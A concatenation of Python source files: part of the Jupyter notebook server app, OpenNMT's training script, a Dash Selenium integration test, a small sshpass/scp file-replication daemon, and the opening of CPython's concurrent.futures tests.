return self._tcp_url(ip)
def _unix_sock_url(self, token=None):
return '%s%s' % (urlencode_unix_socket(self.sock), self.base_url)
def _tcp_url(self, ip, port=None):
proto = 'https' if self.certfile else 'http'
return "%s://%s:%i%s" % (proto, ip, port or self.port, self.base_url)
def init_terminals(self):
if not self.terminals_enabled:
return
try:
from .terminal import initialize
initialize(nb_app=self)
self.terminals_available = True
except ImportError as e:
self.log.warning(_("Terminals not available (error was %s)"), e)
def init_signal(self):
if not sys.platform.startswith('win') and sys.stdin and sys.stdin.isatty():
signal.signal(signal.SIGINT, self._handle_sigint)
signal.signal(signal.SIGTERM, self._signal_stop)
if hasattr(signal, 'SIGUSR1'):
# Windows doesn't support SIGUSR1
signal.signal(signal.SIGUSR1, self._signal_info)
if hasattr(signal, 'SIGINFO'):
# only on BSD-based systems
signal.signal(signal.SIGINFO, self._signal_info)
def _handle_sigint(self, sig, frame):
"""SIGINT handler spawns confirmation dialog"""
# register more forceful signal handler for ^C^C case
signal.signal(signal.SIGINT, self._signal_stop)
# request confirmation dialog in bg thread, to avoid
# blocking the App
thread = threading.Thread(target=self._confirm_exit)
thread.daemon = True
thread.start()
def _restore_sigint_handler(self):
"""callback for restoring original SIGINT handler"""
signal.signal(signal.SIGINT, self._handle_sigint)
def _confirm_exit(self):
"""confirm shutdown on ^C
A second ^C, or answering 'y' within 5s will cause shutdown,
otherwise original SIGINT handler will be restored.
This doesn't work on Windows.
"""
info = self.log.info
info(_('interrupted'))
# Check if answer_yes is set
if self.answer_yes:
self.log.critical(_("Shutting down..."))
# schedule stop on the main thread,
# since this might be called from a signal handler
self.io_loop.add_callback_from_signal(self.io_loop.stop)
return
print(self.notebook_info())
yes = _('y')
no = _('n')
sys.stdout.write(_("Shutdown this notebook server (%s/[%s])? ") % (yes, no))
sys.stdout.flush()
r,w,x = select.select([sys.stdin], [], [], 5)
if r:
line = sys.stdin.readline()
if line.lower().startswith(yes) and no not in line.lower():
self.log.critical(_("Shutdown confirmed"))
# schedule stop on the main thread,
# since this might be called from a signal handler
self.io_loop.add_callback_from_signal(self.io_loop.stop)
return
else:
print(_("No answer for 5s:"), end=' ')
print(_("resuming operation..."))
# no answer, or answer is no:
# set it back to original SIGINT handler
# use IOLoop.add_callback because signal.signal must be called
# from main thread
self.io_loop.add_callback_from_signal(self._restore_sigint_handler)
def _signal_stop(self, sig, frame):
self.log.critical(_("received signal %s, stopping"), sig)
self.io_loop.add_callback_from_signal(self.io_loop.stop)
def _signal_info(self, sig, frame):
print(self.notebook_info())
def init_components(self):
"""Check the components submodule, and warn if it's unclean"""
# TODO: this should still check, but now we use bower, not git submodule
pass
def init_server_extension_config(self):
"""Consolidate server extensions specified by all configs.
The resulting list is stored on self.nbserver_extensions and updates config object.
The extension API is experimental, and may change in future releases.
"""
# TODO: Remove me in notebook 5.0
for modulename in self.server_extensions:
# Don't override disable state of the extension if it already exist
# in the new traitlet
if not modulename in self.nbserver_extensions:
self.nbserver_extensions[modulename] = True
# Load server extensions with ConfigManager.
# This enables merging on keys, which we want for extension enabling.
# Regular config loading only merges at the class level,
# so each level (user > env > system) clobbers the previous.
config_path = jupyter_config_path()
if self.config_dir not in config_path:
# add self.config_dir to the front, if set manually
config_path.insert(0, self.config_dir)
manager = ConfigManager(read_config_path=config_path)
section = manager.get(self.config_file_name)
extensions = section.get('NotebookApp', {}).get('nbserver_extensions', {})
for modulename, enabled in sorted(extensions.items()):
if modulename not in self.nbserver_extensions:
self.config.NotebookApp.nbserver_extensions.update({modulename: enabled})
self.nbserver_extensions.update({modulename: enabled})
def init_server_extensions(self):
"""Load any extensions specified by config.
Import the module, then call the load_jupyter_server_extension function,
if one exists.
The extension API is experimental, and may change in future releases.
"""
for modulename, enabled in sorted(self.nbserver_extensions.items()):
if enabled:
try:
mod = importlib.import_module(modulename)
func = getattr(mod, 'load_jupyter_server_extension', None)
if func is not None:
func(self)
except Exception:
if self.reraise_server_extension_failures:
raise
self.log.warning(_("Error loading server extension %s"), modulename,
exc_info=True)
def init_mime_overrides(self):
# On some Windows machines, an application has registered incorrect
# mimetypes in the registry.
# Tornado uses this when serving .css and .js files, causing browsers to
# reject these files. We know the mimetype always needs to be text/css for css
# and application/javascript for JS, so we override it here
# and explicitly tell the mimetypes to not trust the Windows registry
if os.name == 'nt':
# do not trust windows registry, which regularly has bad info
mimetypes.init(files=[])
# ensure css, js are correct, which are required for pages to function
mimetypes.add_type('text/css', '.css')
mimetypes.add_type('application/javascript', '.js')
# for python <3.8
mimetypes.add_type('application/wasm', '.wasm')
def shutdown_no_activity(self):
"""Shutdown server on timeout when there are no kernels or terminals."""
km = self.kernel_manager
if len(km) != 0:
return # Kernels still running
if self.terminals_available:
term_mgr = self.web_app.settings['terminal_manager']
if term_mgr.terminals:
return # Terminals still running
seconds_since_active = \
(utcnow() - self.web_app.last_activity()).total_seconds()
self.log.debug("No activity for %d seconds.",
seconds_since_active)
if seconds_since_active > self.shutdown_no_activity_timeout:
self.log.info("No kernels or terminals for %d seconds; shutting down.",
seconds_since_active)
self.stop()
def init_shutdown_no_activity(self):
if self.shutdown_no_activity_timeout > 0:
self.log.info("Will shut down after %d seconds with no kernels or terminals.",
self.shutdown_no_activity_timeout)
pc = ioloop.PeriodicCallback(self.shutdown_no_activity, 60000)
pc.start()
def _init_asyncio_patch(self):
"""set default asyncio policy to be compatible with tornado
Tornado <6.1 is not compatible with the default
asyncio implementation on Windows
Pick the older SelectorEventLoopPolicy on Windows
if the known-incompatible default policy is in use.
do this as early as possible to make it a low priority and overrideable
ref: https://github.com/tornadoweb/tornado/issues/2608
FIXME: if/when tornado supports the defaults in asyncio,
remove and bump tornado requirement for py38
"""
if sys.platform.startswith("win") and sys.version_info >= (3, 8) and tornado.version_info < (6, 1):
import asyncio
try:
from asyncio import (
WindowsProactorEventLoopPolicy,
WindowsSelectorEventLoopPolicy,
)
except ImportError:
pass
# not affected
else:
if type(asyncio.get_event_loop_policy()) is WindowsProactorEventLoopPolicy:
# WindowsProactorEventLoopPolicy is not compatible with tornado 6
# fallback to the pre-3.8 default of Selector
asyncio.set_event_loop_policy(WindowsSelectorEventLoopPolicy())
@catch_config_error
def initialize(self, argv=None):
self._init_asyncio_patch()
super().initialize(argv)
self.init_logging()
if self._dispatching:
return
self.init_resources()
self.init_configurables()
self.init_server_extension_config()
self.init_components()
self.init_webapp()
self.init_terminals()
self.init_signal()
self.init_server_extensions()
self.init_mime_overrides()
self.init_shutdown_no_activity()
def cleanup_kernels(self):
"""Shutdown all kernels.
The kernels will shutdown themselves when this process no longer exists,
but explicit shutdown allows the KernelManagers to cleanup the connection files.
"""
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext('Shutting down %d kernel', 'Shutting down %d kernels', n_kernels)
self.log.info(kernel_msg % n_kernels)
run_sync(self.kernel_manager.shutdown_all())
def cleanup_terminals(self):
"""Shutdown all terminals.
The terminals will shutdown themselves when this process no longer exists,
but explicit shutdown allows the TerminalManager to cleanup.
"""
if not self.terminals_available:
return
terminal_manager = self.web_app.settings['terminal_manager']
n_terminals = len(terminal_manager.list())
terminal_msg = trans.ngettext('Shutting down %d terminal', 'Shutting down %d terminals', n_terminals)
self.log.info(terminal_msg % n_terminals)
run_sync(terminal_manager.terminate_all())
def notebook_info(self, kernel_count=True):
"Return the current working directory and the server url information"
info = self.contents_manager.info_string() + "\n"
if kernel_count:
n_kernels = len(self.kernel_manager.list_kernel_ids())
kernel_msg = trans.ngettext("%d active kernel", "%d active kernels", n_kernels)
info += kernel_msg % n_kernels
info += "\n"
# Format the info so that the URL fits on a single line in 80 char display
info += _("Jupyter Notebook {version} is running at:\n{url}".
format(version=NotebookApp.version, url=self.display_url))
if self.gateway_config.gateway_enabled:
info += _("\nKernels will be managed by the Gateway server running at:\n%s") % self.gateway_config.url
return info
def server_info(self):
"""Return a JSONable dict of information about this server."""
return {'url': self.connection_url,
'hostname': self.ip if self.ip else 'localhost',
'port': self.port,
'sock': self.sock,
'secure': bool(self.certfile),
'base_url': self.base_url,
'token': self.token,
'notebook_dir': os.path.abspath(self.notebook_dir),
'password': bool(self.password),
'pid': os.getpid(),
}
def write_server_info_file(self):
"""Write the result of server_info() to the JSON file info_file."""
try:
with open(self.info_file, 'w') as f:
json.dump(self.server_info(), f, indent=2, sort_keys=True)
except OSError as e:
self.log.error(_("Failed to write server-info to %s: %s"),
self.info_file, e)
def remove_server_info_file(self):
"""Remove the nbserver-<pid>.json file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.info_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def write_browser_open_file(self):
"""Write an nbserver-<pid>-open.html file
This can be used to open the notebook in a browser
"""
# default_url contains base_url, but so does connection_url
open_url = self.default_url[len(self.base_url):]
with open(self.browser_open_file, 'w', encoding='utf-8') as f:
self._write_browser_open_file(open_url, f)
def _write_browser_open_file(self, url, fh):
if self.token:
url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, url)
jinja2_env = self.web_app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url))
def remove_browser_open_file(self):
"""Remove the nbserver-<pid>-open.html file created for this server.
Ignores the error raised when the file has already been removed.
"""
try:
os.unlink(self.browser_open_file)
except OSError as e:
if e.errno != errno.ENOENT:
raise
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
if not self.use_redirect_file:
uri = self.default_url[len(self.base_url):]
if self.token:
uri = url_concat(uri, {'token': self.token})
if self.file_to_run:
if not os.path.exists(self.file_to_run):
self.log.critical(_("%s does not exist") % self.file_to_run)
self.exit(1)
relpath = os.path.relpath(self.file_to_run, self.notebook_dir)
uri = url_escape(url_path_join('notebooks', *relpath.split(os.sep)))
# Write a temporary file to open in the browser
fd, open_file = tempfile.mkstemp(suffix='.html')
with open(fd, 'w', encoding='utf-8') as fh:
self._write_browser_open_file(uri, fh)
else:
open_file = self.browser_open_file
if self.use_redirect_file:
assembled_url = urljoin('file:', pathname2url(open_file))
else:
assembled_url = url_path_join(self.connection_url, uri)
b = lambda: browser.open(assembled_url, new=self.webbrowser_open_new)
threading.Thread(target=b).start()
def start(self):
""" Start the Notebook server app, after initialization
This method takes no arguments so all configuration and initialization
must be done prior to calling this method."""
super().start()
if not self.allow_root:
# check if we are running as root, and abort if it's not allowed
try:
uid = os.geteuid()
except AttributeError:
uid = -1 # anything nonzero here, since we can't check UID assume non-root
if uid == 0:
self.log.critical(_("Running as root is not recommended. Use --allow-root to bypass."))
self.exit(1)
info = self.log.info
for line in self.notebook_info(kernel_count=False).split("\n"):
info(line)
info(_("Use Control-C to stop this server and shut down all kernels (twice to skip confirmation)."))
if 'dev' in notebook.__version__:
info(_("Welcome to Project Jupyter! Explore the various tools available"
" and their corresponding documentation. If you are interested"
" in contributing to the platform, please visit the community"
"resources section at https://jupyter.org/community.html."))
self.write_server_info_file()
self.write_browser_open_file()
if (self.open_browser or self.file_to_run) and not self.sock:
self.launch_browser()
if self.token and self._token_generated:
# log full URL with generated token, so there's a copy/pasteable link
# with auth info.
if self.sock:
self.log.critical('\n'.join([
'\n',
'Notebook is listening on %s' % self.display_url,
'',
(
'UNIX sockets are not browser-connectable, but you can tunnel to '
'the instance via e.g.`ssh -L 8888:%s -N user@this_host` and then '
'open e.g. %s in a browser.'
) % (self.sock, self._concat_token(self._tcp_url('localhost', 8888)))
]))
else:
if not self.custom_display_url:
self.log.critical('\n'.join([
'\n',
'To access the notebook, open this file in a browser:',
' %s' % urljoin('file:', pathname2url(self.browser_open_file)),
'Or copy and paste one of these URLs:',
' %s' % self.display_url,
]))
else:
self.log.critical('\n'.join([
'\n',
'To access the notebook, open this file in a browser:',
' %s' % urljoin('file:', pathname2url(self.browser_open_file)),
'Or copy and paste this URL:',
' %s' % self.display_url,
]))
self.io_loop = ioloop.IOLoop.current()
if sys.platform.startswith('win'):
# add no-op to wake every 5s
# to handle signals that may be ignored by the inner loop
pc = ioloop.PeriodicCallback(lambda : None, 5000)
pc.start()
try:
self.io_loop.start()
except KeyboardInterrupt:
info(_("Interrupted..."))
finally:
self.remove_server_info_file()
self.remove_browser_open_file()
self.cleanup_kernels()
self.cleanup_terminals()
def stop(self):
def _stop():
self.http_server.stop()
self.io_loop.stop()
self.io_loop.add_callback(_stop)
def list_running_servers(runtime_dir=None):
"""Iterate over the server info files of running notebook servers.
Given a runtime directory, find nbserver-* files in the security directory,
and yield dicts of their information, each one pertaining to
a currently running notebook server instance.
"""
if runtime_dir is None:
runtime_dir = jupyter_runtime_dir()
# The runtime dir might not exist
if not os.path.isdir(runtime_dir):
return
for file_name in os.listdir(runtime_dir):
if re.match('nbserver-(.+).json', file_name):
with io.open(os.path.join(runtime_dir, file_name), encoding='utf-8') as f:
info = json.load(f)
# Simple check whether that process is really still running
# Also remove leftover files from IPython 2.x without a pid field
if ('pid' in info) and check_pid(info['pid']):
yield info
else:
# If the process has died, try to delete its info file
try:
os.unlink(os.path.join(runtime_dir, file_name))
except OSError:
pass # TODO: This should warn or log or something
#-----------------------------------------------------------------------------
# Main entry point
#-----------------------------------------------------------------------------
main = launch_new_instance = NotebookApp.launch_instance
|
train.py
|
#!/usr/bin/env python
"""Train models."""
import os
import signal
import torch
import onmt.opts as opts
import onmt.utils.distributed
from onmt.utils.misc import set_random_seed
from onmt.utils.logging import init_logger, logger
from onmt.train_single import main as single_main
from onmt.utils.parse import ArgumentParser
from onmt.inputters.inputter import build_dataset_iter, patch_fields, \
load_old_vocab, old_style_vocab, build_dataset_iter_multiple
from itertools import cycle
def train(opt):
ArgumentParser.validate_train_opts(opt)
ArgumentParser.update_model_opts(opt)
ArgumentParser.validate_model_opts(opt)
logger = init_logger(opt.log_file)
set_random_seed(opt.seed, False)
logger.info("The Input Parameters:")
for key, val in vars(opt).items():
logger.info(f"[Config]: {key} => {val}")
# Load checkpoint if we resume from a previous training.
if opt.train_from:
logger.info('Loading checkpoint from %s' % opt.train_from)
checkpoint = torch.load(opt.train_from,
map_location=lambda storage, loc: storage)
logger.info('Loading vocab from checkpoint at %s.' % opt.train_from)
vocab = checkpoint['vocab']
else:
vocab = torch.load(opt.data + '.vocab.pt')
# check for code where vocab is saved instead of fields
# (in the future this will be done in a smarter way)
if old_style_vocab(vocab):
fields = load_old_vocab(
vocab, opt.model_type, dynamic_dict=opt.copy_attn)
else:
fields = vocab
# patch for fields that may be missing in old data/model
patch_fields(opt, fields)
if len(opt.data_ids) > 1:
train_shards = []
for train_id in opt.data_ids:
shard_base = "train_" + train_id
train_shards.append(shard_base)
train_iter = build_dataset_iter_multiple(train_shards, fields, opt)
else:
if opt.data_ids[0] is not None:
shard_base = "train_" + opt.data_ids[0]
else:
shard_base = "train"
train_iter = build_dataset_iter(shard_base, fields, opt)
nb_gpu = len(opt.gpu_ranks)
if opt.world_size > 1:
queues = []
mp = torch.multiprocessing.get_context('spawn')
semaphore = mp.Semaphore(opt.world_size * opt.queue_size)
# Create a thread to listen for errors in the child processes.
error_queue = mp.SimpleQueue()
error_handler = ErrorHandler(error_queue)
# Train with multiprocessing.
procs = []
for device_id in range(nb_gpu):
q = mp.Queue(opt.queue_size)
queues += [q]
procs.append(mp.Process(target=run, args=(
opt, device_id, error_queue, q, semaphore), daemon=True))
procs[device_id].start()
logger.info(" Starting process pid: %d " % procs[device_id].pid)
error_handler.add_child(procs[device_id].pid)
producer = mp.Process(target=batch_producer,
args=(train_iter, queues, semaphore, opt,),
daemon=True)
producer.start()
error_handler.add_child(producer.pid)
for p in procs:
p.join()
producer.terminate()
elif nb_gpu == 1: # case 1 GPU only
single_main(opt, 0)
else: # case only CPU
single_main(opt, -1)
def batch_producer(generator_to_serve, queues, semaphore, opt):
init_logger(opt.log_file)
set_random_seed(opt.seed, False)
# generator_to_serve = iter(generator_to_serve)
def pred(x):
"""
Filters batches that belong only
to gpu_ranks of current node
"""
for rank in opt.gpu_ranks:
if x[0] % opt.world_size == rank:
return True
generator_to_serve = filter(
pred, enumerate(generator_to_serve))
def next_batch(device_id):
new_batch = next(generator_to_serve)
semaphore.acquire()
return new_batch[1]
b = next_batch(0)
for device_id, q in cycle(enumerate(queues)):
b.dataset = None
if isinstance(b.src, tuple):
b.src = tuple([_.to(torch.device(device_id))
for _ in b.src])
else:
b.src = b.src.to(torch.device(device_id))
if hasattr(b, "src_path"):
if isinstance(b.src_path, tuple):
b.src_path = tuple([_.to(torch.device(device_id))
for _ in b.src_path])
else:
b.src_path = b.src_path.to(torch.device(device_id))
if hasattr(b, "tgt_path"):
if isinstance(b.tgt_path, tuple):
b.tgt_path = tuple([_.to(torch.device(device_id))
for _ in b.tgt_path])
else:
b.tgt_path = b.tgt_path.to(torch.device(device_id))
b.tgt = b.tgt.to(torch.device(device_id))
b.indices = b.indices.to(torch.device(device_id))
b.alignment = b.alignment.to(torch.device(device_id)) \
if hasattr(b, 'alignment') else None
b.src_map = b.src_map.to(torch.device(device_id)) \
if hasattr(b, 'src_map') else None
b.align = b.align.to(torch.device(device_id)) \
if hasattr(b, 'align') else None
b.corpus_id = b.corpus_id.to(torch.device(device_id)) \
if hasattr(b, 'corpus_id') else None
# hack to dodge unpicklable `dict_keys`
b.fields = list(b.fields)
q.put(b)
b = next_batch(device_id)
def run(opt, device_id, error_queue, batch_queue, semaphore):
""" run process """
try:
gpu_rank = onmt.utils.distributed.multi_init(opt, device_id)
if gpu_rank != opt.gpu_ranks[device_id]:
raise AssertionError("An error occurred in \
Distributed initialization")
single_main(opt, device_id, batch_queue, semaphore)
except KeyboardInterrupt:
pass # killed by parent, do nothing
except Exception:
# propagate exception to parent process, keeping original traceback
import traceback
error_queue.put((opt.gpu_ranks[device_id], traceback.format_exc()))
class ErrorHandler(object):
"""A class that listens for exceptions in children processes and propagates
the tracebacks to the parent process."""
def __init__(self, error_queue):
""" init error handler """
import signal
import threading
self.error_queue = error_queue
self.children_pids = []
self.error_thread = threading.Thread(
target=self.error_listener, daemon=True)
self.error_thread.start()
signal.signal(signal.SIGUSR1, self.signal_handler)
def add_child(self, pid):
""" error handler """
self.children_pids.append(pid)
def error_listener(self):
""" error listener """
(rank, original_trace) = self.error_queue.get()
self.error_queue.put((rank, original_trace))
os.kill(os.getpid(), signal.SIGUSR1)
def signal_handler(self, signalnum, stackframe):
""" signal handler """
for pid in self.children_pids:
os.kill(pid, signal.SIGINT) # kill children processes
(rank, original_trace) = self.error_queue.get()
msg = """\n\n-- Tracebacks above this line can probably
be ignored --\n\n"""
msg += original_trace
raise Exception(msg)
def _get_parser():
parser = ArgumentParser(model="train", description='train.py')
opts.config_opts(parser)
opts.model_opts(parser)
opts.train_opts(parser)
return parser
def main():
parser = _get_parser()
opt = parser.parse_args()
train(opt)
if __name__ == "__main__":
main()
|
IntegrationTests.py
|
from __future__ import absolute_import
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import importlib
import multiprocessing
import percy
import time
import unittest
class IntegrationTests(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(IntegrationTests, cls).setUpClass()
cls.driver = webdriver.Chrome()
loader = percy.ResourceLoader(webdriver=cls.driver)
cls.percy_runner = percy.Runner(loader=loader)
cls.percy_runner.initialize_build()
@classmethod
def tearDownClass(cls):
super(IntegrationTests, cls).tearDownClass()
cls.driver.quit()
cls.percy_runner.finalize_build()
def setUp(self):
pass
def tearDown(self):
time.sleep(3)
self.server_process.terminate()
time.sleep(3)
def startServer(self, app):
def run():
app.scripts.config.serve_locally = True
app.css.config.serve_locally = True
app.run_server(
port=8050,
debug=False,
processes=4
)
# Run on a separate process so that it doesn't block
self.server_process = multiprocessing.Process(target=run)
self.server_process.start()
time.sleep(5)
# Visit the dash page
self.driver.get('http://localhost:8050')
time.sleep(0.5)
# Inject an error and warning logger
logger = '''
window.tests = {};
window.tests.console = {error: [], warn: [], log: []};
var _log = console.log;
var _warn = console.warn;
var _error = console.error;
console.log = function() {
window.tests.console.log.push({method: 'log', arguments: arguments});
return _log.apply(console, arguments);
};
console.warn = function() {
window.tests.console.warn.push({method: 'warn', arguments: arguments});
return _warn.apply(console, arguments);
};
console.error = function() {
window.tests.console.error.push({method: 'error', arguments: arguments});
return _error.apply(console, arguments);
};
'''
self.driver.execute_script(logger)
|
daemon_repl.py
|
import os
import threading
import logging
import time
log_filename = 'logs/'+'repl.log'
logging.basicConfig(filename = log_filename,filemode = 'a',level=logging.DEBUG,format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')
logger = logging.getLogger('daemon_repl.py')
class Backup_Data:
def __init__(self):
self.slavenum = "Slave1"
self.dbfile = "MugenDBfile.txt"
self.backupfile = "Backup_MugenDBfile.txt"
self.backuppatch = "Backup_MugenDBfile.patch"
self.keymapfile = "KeyMap.txt"
self.keymapbackup = "Backup_KeyMap.txt"
self.keymappatch = "Backup_KeyMap.patch"
self.replpass = list()
with open("config/password.txt",'r') as fin:
for line in fin:
self.replpass.append(line.strip().split("="))
def backup(self):
''' Creates threads and does scp for data replication to nodes'''
if(os.path.isfile(self.backupfile) == False):
f = file(self.backupfile,"w")
os.system("diff -u {0} {1} > {2}".format(self.backupfile,self.dbfile,self.backuppatch))
if(os.path.isfile(self.keymapbackup) == False):
f = file(self.keymapbackup,"w")
os.system("diff -u {0} {1} > {2}".format(self.keymapbackup,self.keymapfile,self.keymappatch))
os.system("sshpass -p '{0}' scp {1} spulima@{2}:/home/spulima/backup".format(self.replpass[0][2],self.keymappatch,self.replpass[0][1]))
os.system("patch {0} {1}".format(self.keymapbackup,self.keymappatch))
os.system("rm {}".format(self.keymappatch))
t1 = threading.Thread(target=self.repl,args=(self.replpass[0],))
t2 = threading.Thread(target=self.repl,args=(self.replpass[1],))
t3 = threading.Thread(target=self.repl,args=(self.replpass[2],))
t1.start()
t2.start()
t3.start()
t1.join()
t2.join()
t3.join()
os.system("patch {0} {1}".format(self.backupfile,self.backuppatch))
os.system("rm {}".format(self.backuppatch))
return 0
def repl(self,repl):
logger.debug("replicating on {0}@{1}".format(self.slavenum,repl[1]))
os.system("cp Backup_MugenDBfile.patch Backup_MugenDBfile_{}.patch".format(self.slavenum))
os.system("sshpass -p '{0}' scp Backup_MugenDBfile_{1}.patch spulima@{2}:/home/spulima/backup".format(repl[2],self.slavenum,repl[1]))
logger.debug("replicated on {0}@{1}".format(self.slavenum,repl[1]))
os.system("rm Backup_MugenDBfile_{}.patch".format(self.slavenum))
def repl_neighbor(self):
filename = "/home/spulima/backup/Backup_MugenDBfile_{0}.patch".format(self.replpass[3][0])
if(os.path.isfile(filename) == True):
if(os.path.isfile("MugenDBfile_{0}.txt".format(self.replpass[3][0])) == False):
f = file("MugenDBfile_{0}.txt".format(self.replpass[3][0]),"w")
logger.debug("patching file on {0}@{1}".format(self.replpass[3][0],self.replpass[3][1]))
os.system("patch MugenDBfile_{0}.txt {1}".format(self.replpass[3][0],filename))
logger.debug("patched file on {0}@{1}".format(self.replpass[3][0],self.replpass[3][1]))
os.system("rm {}".format(filename))
filename = "/home/spulima/backup/Backup_MugenDBfile_{0}.patch".format(self.replpass[4][0])
if(os.path.isfile(filename) == True):
if(os.path.isfile("MugenDBfile_{0}.txt".format(self.replpass[4][0])) == False):
f = file("MugenDBfile_{0}.txt".format(self.replpass[4][0]),"w")
logger.debug("patching file on {0}@{1}".format(self.replpass[4][0],self.replpass[4][1]))
os.system("patch MugenDBfile_{0}.txt {1}".format(self.replpass[4][0],filename))
logger.debug("patched file on {0}@{1}".format(self.replpass[4][0],self.replpass[4][1]))
os.system("rm {}".format(filename))
if __name__ == "__main__":
bkp = Backup_Data()
while(1):
bkp.backup()
bkp.repl_neighbor()
time.sleep(1)
|
test_concurrent_futures.py
|
import test.support
# Skip tests if _multiprocessing wasn't built.
test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
from test.support.script_helper import assert_python_ok
import contextlib
import itertools
import logging
from logging.handlers import QueueHandler
import os
import queue
import sys
import threading
import time
import unittest
import weakref
from pickle import PicklingError
from concurrent import futures
from concurrent.futures._base import (
PENDING, RUNNING, CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED, Future,
BrokenExecutor)
from concurrent.futures.process import BrokenProcessPool
from multiprocessing import get_context
import multiprocessing.process
import multiprocessing.util
def create_future(state=PENDING, exception=None, result=None):
f = Future()
f._state = state
f._exception = exception
f._result = result
return f
PENDING_FUTURE = create_future(state=PENDING)
RUNNING_FUTURE = create_future(state=RUNNING)
CANCELLED_FUTURE = create_future(state=CANCELLED)
CANCELLED_AND_NOTIFIED_FUTURE = create_future(state=CANCELLED_AND_NOTIFIED)
EXCEPTION_FUTURE = create_future(state=FINISHED, exception=OSError())
SUCCESSFUL_FUTURE = create_future(state=FINISHED, result=42)
INITIALIZER_STATUS = 'uninitialized'
def mul(x, y):
return x * y
def capture(*args, **kwargs):
return args, kwargs
def sleep_and_raise(t):
time.sleep(t)
raise Exception('this is an exception')
def sleep_and_print(t, msg):
time.sleep(t)
print(msg)
sys.stdout.flush()
def init(x):
global INITIALIZER_STATUS
INITIALIZER_STATUS = x
def get_init_status():
return INITIALIZER_STATUS
def init_fail(log_queue=None):
if log_queue is not None:
logger = logging.getLogger('concurrent.futures')
logger.addHandler(QueueHandler(log_queue))
logger.setLevel('CRITICAL')
logger.propagate = False
time.sleep(0.1) # let some futures be scheduled
raise ValueError('error in initializer')
class MyObject(object):
def my_method(self):
pass
class EventfulGCObj():
def __init__(self, ctx):
mgr = get_context(ctx).Manager()
self.event = mgr.Event()
def __del__(self):
self.event.set()
def make_dummy_object(_):
return MyObject()
class BaseTestCase(unittest.TestCase):
def setUp(self):
self._thread_key = test.support.threading_setup()
def tearDown(self):
test.support.reap_children()
test.support.threading_cleanup(*self._thread_key)
class ExecutorMixin:
worker_count = 5
executor_kwargs = {}
def setUp(self):
super().setUp()
self.t1 = time.monotonic()
if hasattr(self, "ctx"):
self.executor = self.executor_type(
max_workers=self.worker_count,
mp_context=self.get_context(),
**self.executor_kwargs)
else:
self.executor = self.executor_type(
max_workers=self.worker_count,
**self.executor_kwargs)
self._prime_executor()
def tearDown(self):
self.executor.shutdown(wait=True)
self.executor = None
dt = time.monotonic() - self.t1
if test.support.verbose:
print("%.2fs" % dt, end=' ')
self.assertLess(dt, 300, "synchronization issue: test lasted too long")
super().tearDown()
def get_context(self):
return get_context(self.ctx)
def _prime_executor(self):
# Make sure that the executor is ready to do work before running the
# tests. This should reduce the probability of timeouts in the tests.
futures = [self.executor.submit(time.sleep, 0.1)
for _ in range(self.worker_count)]
for f in futures:
f.result()
class ThreadPoolMixin(ExecutorMixin):
executor_type = futures.ThreadPoolExecutor
class ProcessPoolForkMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "fork"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
class ProcessPoolSpawnMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "spawn"
class ProcessPoolForkserverMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "forkserver"
def get_context(self):
if sys.platform == "win32":
self.skipTest("require unix system")
return super().get_context()
def create_executor_tests(mixin, bases=(BaseTestCase,),
executor_mixins=(ThreadPoolMixin,
ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin)):
def strip_mixin(name):
if name.endswith(('Mixin', 'Tests')):
return name[:-5]
elif name.endswith('Test'):
return name[:-4]
else:
return name
for exe in executor_mixins:
name = ("%s%sTest"
% (strip_mixin(exe.__name__), strip_mixin(mixin.__name__)))
cls = type(name, (mixin,) + (exe,) + bases, {})
globals()[name] = cls
class InitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
global INITIALIZER_STATUS
INITIALIZER_STATUS = 'uninitialized'
self.executor_kwargs = dict(initializer=init,
initargs=('initialized',))
super().setUp()
def test_initializer(self):
futures = [self.executor.submit(get_init_status)
for _ in range(self.worker_count)]
for f in futures:
self.assertEqual(f.result(), 'initialized')
class FailingInitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
if hasattr(self, "ctx"):
# Pass a queue to redirect the child's logging output
self.mp_context = self.get_context()
self.log_queue = self.mp_context.Queue()
self.executor_kwargs = dict(initializer=init_fail,
initargs=(self.log_queue,))
else:
# In a thread pool, the child shares our logging setup
# (see _assert_logged())
self.mp_context = None
self.log_queue = None
self.executor_kwargs = dict(initializer=init_fail)
super().setUp()
def test_initializer(self):
with self._assert_logged('ValueError: error in initializer'):
try:
future = self.executor.submit(get_init_status)
except BrokenExecutor:
# Perhaps the executor is already broken
pass
else:
with self.assertRaises(BrokenExecutor):
future.result()
# At some point, the executor should break
t1 = time.monotonic()
while not self.executor._broken:
if time.monotonic() - t1 > 5:
self.fail("executor not broken after 5 s.")
time.sleep(0.01)
# ... and from this point submit() is guaranteed to fail
with self.assertRaises(BrokenExecutor):
self.executor.submit(get_init_status)
def _prime_executor(self):
pass
@contextlib.contextmanager
def _assert_logged(self, msg):
if self.log_queue is not None:
yield
output = []
try:
while True:
output.append(self.log_queue.get_nowait().getMessage())
except queue.Empty:
pass
else:
with self.assertLogs('concurrent.futures', 'CRITICAL') as cm:
yield
output = cm.output
self.assertTrue(any(msg in line for line in output),
output)
create_executor_tests(InitializerMixin)
create_executor_tests(FailingInitializerMixin)
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
